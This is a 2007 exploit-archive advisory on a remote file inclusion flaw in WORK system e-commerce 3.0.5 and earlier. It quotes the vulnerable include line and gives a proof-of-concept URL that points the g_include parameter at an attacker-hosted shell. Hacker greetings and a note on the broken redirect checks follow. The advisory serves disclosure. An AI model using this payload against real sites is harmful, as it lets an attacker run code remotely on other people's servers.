[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WORK system e-commerce <= 3.0.5 Remote File Inclusion Vulnerability
# Published : 2007-03-10
# Author : Rodrigo Duarte
# Previous Title : cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities
# Next Title : HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability
#####################################################################################
Rodrigo Duarte
Wuefez[AT]2die4.com ;D
WORK system e-commerce:
WORK PHP,Mysql content management system CMS e-commerce or not : ajax, workflow,
content,package,language,currency,country,price,stock,group user,CSS,banner,logo,
link,partner,forum,new,FAQ,event,calendar,invoice,mailing,supplier,RSS, webservices.
Vulnerable Script:
~ include_top.php
(Other scripts of this project are also vulnerable with $g_include)
Vulnerable Code:
include ($g_include."include_logo.php");
PoC:
http://example/[WORK_system_path]/include/include_top.php?g_include=http://shell
d0rk:
[your_creativity_here]
greetz:
Cocada, FoNSECA, maxim noob
SHiKaA, ZeUsSixSixSix, Arthurcmc
pizzer, rmeira and darkers.com.br
and for all the rest, i miss.........
EOF:
BRAZILIAN RAQUER!
MAGIC PEOPLE, VOODOO PEOPLE!
#####################################################################################
defined('G_SESSION_OR_COOKIE') or header( "Location: index.php" );
if ( !isset($g_db_prefix) ) header( "Location: index.php" );
The above isn't the correct way to block inclusions.
# www.Syue.com [2007-03-10]